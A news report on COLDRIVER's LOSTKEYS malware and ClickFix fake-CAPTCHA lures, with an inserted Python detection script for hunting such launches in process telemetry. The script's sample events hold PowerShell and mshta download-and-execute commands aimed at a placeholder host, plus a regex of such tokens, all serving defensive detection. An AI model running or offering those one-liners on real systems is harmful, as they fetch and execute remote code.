COLDRIVER Unleashes ‘LOSTKEYS’ Malware in Sophisticated ClickFix Attacks on Western Targets
The Russia-linked hacking group COLDRIVER—also known as Callisto, Star Blizzard, and UNC4057—has been linked to a new malware variant dubbed LOSTKEYS, used in an ongoing espionage campaign that leverages clever social engineering tactics similar to the ClickFix technique.

According to Google's Threat Intelligence Group (GTIG), LOSTKEYS is designed to exfiltrate sensitive files based on specific file extensions and directories, as well as gather system information and running process data. The malware has been deployed against former and current Western government advisors, journalists, think tanks, NGOs, and individuals tied to Ukraine during attacks observed in January, March, and April 2025.
This marks COLDRIVER’s second known custom malware, following SPICA, and reflects a shift from their traditional credential phishing campaigns toward more tailored malware deployment. Historically, COLDRIVER has focused on stealing account credentials, exfiltrating emails, and pilfering contact lists from compromised systems, occasionally delivering malware to gain deeper access.
The attack begins by luring victims to decoy websites posing as CAPTCHA verification pages. The page silently places a PowerShell command on the clipboard and instructs the victim to open the Windows Run dialog (Win+R) and paste it, the approach popularized by the ClickFix technique. That command downloads and executes a second-stage PowerShell payload, which checks the environment (an anti-VM and sandbox evasion step) before retrieving a Base64-encoded PowerShell script that launches LOSTKEYS. Because the user, rather than an exploit, starts the chain, the telemetry to hunt for is a PowerShell process whose parent is explorer.exe; commands entered through the Run dialog are also recorded under the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Explorer\RunMRU is not the path; the key is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), a useful forensic artifact when reconstructing what was pasted.
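The following is an added detection example, not code from the GTIG report or from the article: it scores process-creation events for the ClickFix pattern described above (a LOLBin such as powershell.exe or mshta.exe spawned by explorer.exe, a download-and-execute one-liner, or a `-EncodedCommand` blob) and decodes the Base64/UTF-16LE payload PowerShell expects. The sample events are constructed to resemble Sysmon Event ID 1 fields, the URLs use the reserved `example.invalid` domain, and the token list, weights and threshold are the author's assumptions, not indicators from the campaign.

```python
"""Hunt for ClickFix-style launches in process-creation telemetry.

Added example: constructed sample events modelled on Sysmon Event ID 1 /
Security 4688 fields. Scoring weights and the token list are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Binaries a paste-and-run lure typically invokes from the Run dialog or Terminal.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
           "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Tokens common to download-and-execute one-liners (assumed list, not IOCs).
SUSPICIOUS = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|"
    r"downloadfile|frombase64string|-w(?:indowstyle)?\s+hidden|"
    r"-e(?:xecutionpolicy|p)\s+bypass|\bcurl\b|\bmshta\b\s+https?://|https?://)",
    re.IGNORECASE)

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a Base64 UTF-16LE script.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument exactly as PowerShell expects (UTF-16LE, Base64).
    Used here only to construct realistic sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcessEvent) -> dict:
    """Score one event: parent explorer.exe +2, encoded command +2, +1 per distinct token."""
    if image_name(ev.image) not in LOLBINS:
        return {"score": 0, "reasons": [], "decoded": None}
    score, reasons = 0, []
    if image_name(ev.parent_image) == "explorer.exe":
        score += 2
        reasons.append("LOLBin spawned by explorer.exe (Run dialog / shell launch)")
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        score += 2
        reasons.append("-EncodedCommand present; decoded for inspection")
    # Scan the visible command line (minus the Base64 blob) plus the decoded script.
    text = ENC_FLAG.sub(" ", ev.command_line) + " " + (decoded or "")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(text)})
    if hits:
        score += len(hits)
        reasons.append("download/execute tokens: " + ", ".join(hits))
    return {"score": score, "reasons": reasons, "decoded": decoded}


def hunt(events, threshold: int = 3):
    """Return (event, analysis) pairs at or above the (assumed) alert threshold."""
    return [(ev, r) for ev in events if (r := analyze(ev))["score"] >= threshold]


# Constructed sample telemetry (not real campaign data).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe", PS,
                 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/s.ps1 | iex"'),
    ProcessEvent("C:\\Windows\\explorer.exe", PS, "powershell -nop -enc " + encode_command(
        "IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))")),
    ProcessEvent("C:\\Program Files\\Editor\\Code.exe", PS,
                 "powershell -NoProfile -File build.ps1"),          # benign developer task
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\mshta.exe",
                 "mshta https://example.invalid/x.hta"),
]

if __name__ == "__main__":
    for ev, r in hunt(SAMPLE_EVENTS):
        print(f"[score {r['score']}] {image_name(ev.image)}: {ev.command_line[:60]}")
        for reason in r["reasons"]:
            print("   -", reason)
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

On a live host the same fields come from Sysmon Event ID 1 (ParentImage, Image, CommandLine) or Security event 4688 with command-line auditing enabled; the explorer.exe parent check is what separates a pasted Run-dialog command from the many legitimate PowerShell launches by IDEs, installers and scheduled tasks, which is why the benign third event scores zero.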
Google's researchers also identified older LOSTKEYS artifacts dating back to December 2023, disguised as tools related to the Maltego investigation platform. However, it remains unclear whether those samples were also linked to COLDRIVER or if the malware was repurposed more recently.
The report highlights a broader trend: multiple cybercriminal groups are adopting ClickFix-style techniques to distribute various malware strains. For example, Lampion, a banking trojan, uses phishing emails with ZIP attachments that redirect recipients to fake CAPTCHA pages and employ a multi-stage infection process that masks the malware's activity by fragmenting execution across separate processes.
Another evolving threat combines ClickFix with EtherHiding, a technique that hides next-stage payloads in Binance Smart Chain (BSC) contracts. One such campaign, dubbed MacReaper, uses fake CAPTCHAs to spread the Atomic Stealer macOS malware. Victims are prompted to paste clipboard commands into Terminal, which initiates the download of a signed Mach-O binary.
The MacReaper campaign has reportedly compromised over 2,800 legitimate websites to distribute these malicious CAPTCHA prompts, using techniques like obfuscated JavaScript, full-screen iframes, and blockchain-based command infrastructure to evade detection and maximize infections.